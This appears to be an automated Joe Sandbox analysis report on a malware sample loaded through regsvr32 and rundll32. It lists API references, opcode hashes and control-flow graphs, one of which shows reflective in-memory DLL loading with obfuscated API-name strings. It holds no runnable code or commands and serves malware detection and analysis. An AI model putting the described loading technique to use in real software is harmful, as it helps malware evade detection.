                                                                                                                                      • Opcode ID: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                                                                                      • Instruction ID: 5483c08afe577f557a02dbbcd6525ae3109298d845e02828e4617dc933e58c5b
                                                                                                                                      • Opcode Fuzzy Hash: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                                                                                      • Instruction Fuzzy Hash: 89219036E187424AFB159E61A41137A62D0AFA4780F188176DB4CA7BD6FFBCD4118E01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _lock.LIBCMT ref: 00007FFFE23153B2
                                                                                                                                      • free.LIBCMT ref: 00007FFFE23153D7
                                                                                                                                        • Part of subcall function 00007FFFE2313024: HeapFree.KERNEL32(?,?,00000000,00007FFFE2312DDC,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231303A
                                                                                                                                        • Part of subcall function 00007FFFE2313024: _errno.LIBCMT ref: 00007FFFE2313044
                                                                                                                                        • Part of subcall function 00007FFFE2313024: GetLastError.KERNEL32(?,?,00000000,00007FFFE2312DDC,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231304C
                                                                                                                                      • _lock.LIBCMT ref: 00007FFFE23153F2
                                                                                                                                      • free.LIBCMT ref: 00007FFFE2315438
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _lockfree$ErrorFreeHeapLast_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188102813-0
                                                                                                                                      • Opcode ID: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                                                                                      • Instruction ID: bce1c597d35f7b0132217e69a050f1769dcef067e98227c07400dd2aa83081c6
                                                                                                                                      • Opcode Fuzzy Hash: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                                                                                      • Instruction Fuzzy Hash: 8A117C21E0A5028DFF549BB1D46137823D09FA4B04F5496B6D61EB32C2FEECA8418F23
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalDeleteSection$Freefree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1250194111-0
                                                                                                                                      • Opcode ID: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                                                                                      • Instruction ID: 7889fc12e7b85cb575facbe50f71baa06c8fedef998d14ea35c46937ca7d5f54
                                                                                                                                      • Opcode Fuzzy Hash: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                                                                                      • Instruction Fuzzy Hash: 53118672E095918AE7148B55E84033873E0FF64B50F6885B1D65DA2696EF7CE4918F02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _lock$Sleep_errno_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2111406555-0
                                                                                                                                      • Opcode ID: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                                                                                      • Instruction ID: 7d6707429a1fd64596846ac90afab7b6e091038c664e0fa4f9f8cd830480085f
                                                                                                                                      • Opcode Fuzzy Hash: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                                                                                      • Instruction Fuzzy Hash: 95019E21E092428AF7446BB1D4127AD63D0EF64B84F108176DA0DA73C7EEACA850CB52
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$_getptd
                                                                                                                                      • String ID: #
                                                                                                                                      • API String ID: 3432092939-1885708031
                                                                                                                                      • Opcode ID: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                                                                                      • Instruction ID: 9d679bcdcc65fdd0bd3dfd06c377326a6d88e0bd17448ac88cc8aac9a67f8711
                                                                                                                                      • Opcode Fuzzy Hash: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                                                                                      • Instruction Fuzzy Hash: DE51A022E0C68589E7218F25E44037EABA1FB91B90F584173DA8EA3755EEBDD441CF02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                      • Opcode ID: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                                                                                      • Instruction ID: 2ccb6af90dc314556371430caf215c2c19b884e60eb888a0d0141a7d62cd5554
                                                                                                                                      • Opcode Fuzzy Hash: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                                                                                      • Instruction Fuzzy Hash: 7551A432E08681CDEA609F11A4402B977E1BB65B80F554573DB9EA7781EEBCE542CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:10.7%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:11
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 3264 23396db0000 3265 23396db0183 3264->3265 3266 23396db043e VirtualAlloc 3265->3266 3269 23396db0462 3266->3269 3267 23396db0531 GetNativeSystemInfo 3268 23396db056d VirtualAlloc 3267->3268 3271 23396db0a7b 3267->3271 3273 23396db058b 3268->3273 3269->3267 3269->3271 3270 23396db0a00 3270->3271 3272 23396db0a56 RtlAddFunctionTable 3270->3272 3272->3271 3273->3270 3274 23396db09d9 VirtualProtect 3273->3274 3274->3273

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 23396db0000-23396db0460 call 23396db0aa8 * 2 VirtualAlloc 22 23396db0462-23396db0466 0->22 23 23396db048a-23396db0494 0->23 24 23396db0468-23396db0488 22->24 26 23396db0a91-23396db0aa6 23->26 27 23396db049a-23396db049e 23->27 24->23 24->24 27->26 28 23396db04a4-23396db04a8 27->28 28->26 29 23396db04ae-23396db04b2 28->29 29->26 30 23396db04b8-23396db04bf 29->30 30->26 31 23396db04c5-23396db04d2 30->31 31->26 32 23396db04d8-23396db04e1 31->32 32->26 33 23396db04e7-23396db04f4 32->33 33->26 34 23396db04fa-23396db0507 33->34 35 23396db0531-23396db0567 GetNativeSystemInfo 34->35 36 23396db0509-23396db0511 34->36 35->26 38 23396db056d-23396db0589 VirtualAlloc 35->38 37 23396db0513-23396db0518 36->37 39 23396db0521 37->39 40 23396db051a-23396db051f 37->40 41 23396db058b-23396db059e 38->41 42 23396db05a0-23396db05ac 38->42 43 23396db0523-23396db052f 39->43 40->43 41->42 44 23396db05af-23396db05b2 42->44 43->35 43->37 45 23396db05c1-23396db05db 44->45 46 23396db05b4-23396db05bf 44->46 48 23396db05dd-23396db05e2 45->48 49 23396db061b-23396db0622 45->49 46->44 50 23396db05e4-23396db05ea 48->50 51 23396db06db-23396db06e2 49->51 52 23396db0628-23396db062f 49->52 53 23396db05ec-23396db0609 50->53 54 23396db060b-23396db0619 50->54 56 23396db0864-23396db086b 51->56 57 23396db06e8-23396db06f9 51->57 52->51 55 23396db0635-23396db0642 52->55 53->53 53->54 54->49 54->50 55->51 60 23396db0648-23396db064f 55->60 58 23396db0871-23396db087f 56->58 59 23396db0917-23396db0929 56->59 61 23396db0702-23396db0705 57->61 64 23396db090e-23396db0911 58->64 62 23396db092f-23396db0937 59->62 63 23396db0a07-23396db0a1a 59->63 65 23396db0654-23396db0658 60->65 66 23396db06fb-23396db06ff 61->66 67 23396db0707-23396db070a 61->67 69 23396db093b-23396db093f 62->69 80 23396db0a1c-23396db0a27 63->80 81 23396db0a40-23396db0a4a 63->81 64->59 68 23396db0884-23396db08a9 64->68 70 23396db06c0-23396db06ca 65->70 66->61 71 23396db070c-23396db071d 67->71 72 23396db0788-23396db078e 67->72 97 23396db08ab-23396db08b1 68->97 98 23396db0907-23396db090c 68->98 76 23396db09ec-23396db09fa 69->76 77 23396db0945-23396db095a 69->77 74 23396db06cc-23396db06d2 70->74 75 23396db065a-23396db0669 70->75 73 23396db0794-23396db07a2 71->73 78 23396db071f-23396db0720 71->78 72->73 82 23396db085d-23396db085e 73->82 83 23396db07a8 73->83 74->65 84 23396db06d4-23396db06d5 74->84 88 23396db066b-23396db0678 75->88 89 23396db067a-23396db067e 75->89 76->69 90 23396db0a00-23396db0a01 76->90 86 23396db095c-23396db095e 77->86 87 23396db097b-23396db097d 77->87 91 23396db0722-23396db0784 78->91 93 23396db0a38-23396db0a3e 80->93 95 23396db0a4c-23396db0a54 81->95 96 23396db0a7b-23396db0a8e 81->96 82->56 94 23396db07ae-23396db07d4 83->94 84->51 99 23396db096e-23396db0979 86->99 100 23396db0960-23396db096c 86->100 102 23396db09a2-23396db09a4 87->102 103 23396db097f-23396db0981 87->103 101 23396db06bd-23396db06be 88->101 104 23396db068c-23396db0690 89->104 105 23396db0680-23396db068a 89->105 90->63 91->91 92 23396db0786 91->92 92->73 93->81 112 23396db0a29-23396db0a35 93->112 131 23396db07d6-23396db07d9 94->131 132 23396db0835-23396db0839 94->132 95->96 113 23396db0a56-23396db0a79 RtlAddFunctionTable 95->113 96->26 110 23396db08bb-23396db08c8 97->110 111 23396db08b3-23396db08b9 97->111 98->64 114 23396db09be-23396db09bf 99->114 100->114 101->70 108 23396db09ac-23396db09bb 102->108 109 23396db09a6-23396db09aa 102->109 115 23396db0983-23396db0987 103->115 116 23396db0989-23396db098b 103->116 106 23396db0692-23396db06a3 104->106 107 23396db06a5-23396db06a9 104->107 117 23396db06b6-23396db06ba 105->117 106->117 107->101 119 23396db06ab-23396db06b3 107->119 108->114 109->114 122 23396db08d3-23396db08e5 110->122 123 23396db08ca-23396db08d1 110->123 121 23396db08ea-23396db08fe 111->121 112->93 113->96 120 23396db09c5-23396db09cb 114->120 115->114 116->102 118 23396db098d-23396db098f 116->118 117->101 126 23396db0991-23396db0997 118->126 127 23396db0999-23396db09a0 118->127 119->117 128 23396db09cd-23396db09d3 120->128 129 23396db09d9-23396db09e9 VirtualProtect 120->129 121->98 139 23396db0900-23396db0905 121->139 122->121 123->122 123->123 126->114 127->120 128->129 129->76 136 23396db07db-23396db07e1 131->136 137 23396db07e3-23396db07f0 131->137 133 23396db083b 132->133 134 23396db0844-23396db0850 132->134 133->134 134->94 138 23396db0856-23396db0857 134->138 140 23396db0812-23396db082c 136->140 141 23396db07fb-23396db080d 137->141 142 23396db07f2-23396db07f9 137->142 138->82 139->97 140->132 144 23396db082e-23396db0833 140->144 141->140 142->141 142->142 144->131
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.265165676.0000023396DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023396DB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_23396db0000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                      • API String ID: 394283112-2517549848
                                                                                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction ID: 420feef43b886bf30a47f95d3b86a81662d096b3b9e99f739af216fef194464e
                                                                                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction Fuzzy Hash: E5721430518A89CBDB68DF29C8897B9B7E0FB98300F10462DE89AD3255DB78D741CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                                      • API String ID: 0-464535774
                                                                                                                                      • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                      • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                                      • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                      • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 210 1800117f9-180011803 195->210 199->182 207->188 215 1800113dd 207->215 208->207 210->188 212 180011805-18001180f 210->212 212->182 215->181
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                                      • API String ID: 0-3528011396
                                                                                                                                      • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                      • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                                      • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                      • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 229 180021bdf-180021bee 221->229 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 230 1800219e4-1800219ee 227->230 231 180021681-180021686 227->231 229->217 230->217 233 1800219d5-1800219df call 18001dfb4 231->233 234 18002168c-180021691 231->234 233->217 235 180021697-18002169c 234->235 236 18002190c-1800219a5 call 18000abac 234->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 247 1800219b2-1800219c6 243->247 248 1800219cb-1800219d0 243->248 244->224 247->217 248->217
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                                      • API String ID: 0-3036092626
                                                                                                                                      • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                      • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                                      • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                      • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 262 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->262 263 18000cca0-18000cca5 256->263 290 18000cfb4-18000d00a call 1800194a4 257->290 264 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->264 265 18000c64e-18000c653 258->265 293 18000cc28-18000cc85 call 1800194a4 259->293 304 18000cedc-18000cf26 call 1800194a4 262->304 266 18000cd35-18000cdce call 18000703c call 18001c32c 263->266 267 18000ccab-18000ccb0 263->267 264->253 269 18000c9c1-18000ca52 call 18002870c call 18001c32c 265->269 270 18000c659-18000c65e 265->270 309 18000cdd3-18000ce2e call 1800194a4 266->309 274 18000ccb6-18000cd30 call 180021434 267->274 275 18000d00f-18000d014 267->275 312 18000ca57-18000caa0 call 1800194a4 269->312 277 18000c664-18000c669 270->277 278 18000c8bb-18000c963 call 180002610 call 18001c32c 270->278 274->253 275->253 291 18000d01a-18000d020 275->291 286 18000c7b2-18000c85a call 180019618 call 18001c32c 277->286 287 18000c66f-18000c674 277->287 317 18000c968-18000c9bc call 1800194a4 278->317 324 18000c85f-18000c8b6 call 1800194a4 286->324 287->275 297 18000c67a-18000c73d call 180002178 call 18001c32c 287->297 290->275 293->253 326 18000c742-18000c7ad call 1800194a4 297->326 304->253 309->253 312->253 317->253 324->253 326->253
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +#;)$K'$sf$w\H
                                                                                                                                      • API String ID: 0-1051058546
                                                                                                                                      • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                      • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                      • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                      • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: <4P$<8$<w.
                                                                                                                                      • API String ID: 0-1030867500
                                                                                                                                      • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                      • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                      • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                      • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                      • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                                      • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                      • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 363 180022055-18002205b 361->363 364 18002232e-180022333 361->364 366 180022061-180022067 363->366 367 1800222be-180022329 call 180019cb4 363->367 364->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 373 1800223b2-1800223c2 368->373 370->368 372 180022075-180022083 370->372 371->368 376 180022089-18002208d 372->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                                      • API String ID: 0-2447245168
                                                                                                                                      • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                      • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                                      • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                      • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
